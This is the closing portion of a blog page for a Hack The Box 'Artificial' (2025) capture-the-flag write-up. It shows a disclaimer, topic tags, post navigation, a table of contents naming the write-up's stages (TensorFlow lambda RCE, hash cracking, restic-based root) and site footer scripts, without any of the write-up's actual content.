</ul>
<blockquote>
<p>“Every box is a puzzle, but every puzzle is a lesson.”</p>
</blockquote>
<hr>
<p><em>This writeup is for educational purposes only. Always hack responsibly.</em> </p>

		</div>

		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Artificial/">#Artificial</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/TensorFlow/">#TensorFlow</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Docker/">#Docker</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Linux/">#Linux</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Privilege-Escalation/">#Privilege Escalation</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/restic/">#restic</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2025/07/16/hackthebox-outbound-2025/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">Hack The Box - Outbound (2025) Writeup</span>
						<span class="post-nav-item">Prev posts</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2023/02/16/Mary-s-Lamb-is-a-Little-Phreak-bronco-CTF/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">Mary&#39;s Lamb is a Little Phreak:bronco CTF</span>
						<span class="post-nav-item">Next posts</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">On this page</div>
		<div class="page-title">Hack The Box - Artificial (2025) Writeup</div>
		<ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Artificial-Hack-The-Box-2025"><span class="nav-text">Artificial (Hack The Box) - 2025</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-Recon-The-First-Clues"><span class="nav-text">1. Recon: The First Clues</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-Web-App-Dockerfile-Peeking-Behind-the-Curtain"><span class="nav-text">2. Web App &amp; Dockerfile: Peeking Behind the Curtain</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-TensorFlow-Lambda-RCE-When-AI-Bites-Back"><span class="nav-text">3. TensorFlow Lambda RCE: When AI Bites Back</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-From-app-to-gael-Chasing-Hashes"><span class="nav-text">4. From app to gael: Chasing Hashes</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-Backups-Bcrypt-The-sysadm-Secret"><span class="nav-text">5. Backups &amp; Bcrypt: The sysadm Secret</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-Port-Forwarding-Opening-the-Inner-Door"><span class="nav-text">6. Port Forwarding: Opening the Inner Door</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#7-restic-Backing-Up-the-Root"><span class="nav-text">7. restic: Backing Up the Root</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#8-Root-The-Final-Step"><span class="nav-text">8. Root: The Final Step</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Reflections"><span class="nav-text">Reflections</span></a></li></ol></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-regular fa-computer-classic"></i>&nbsp;&nbsp;<a href="/">NI8STALKER</a>
            
        </div>
        
        
        
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>





    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>






  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>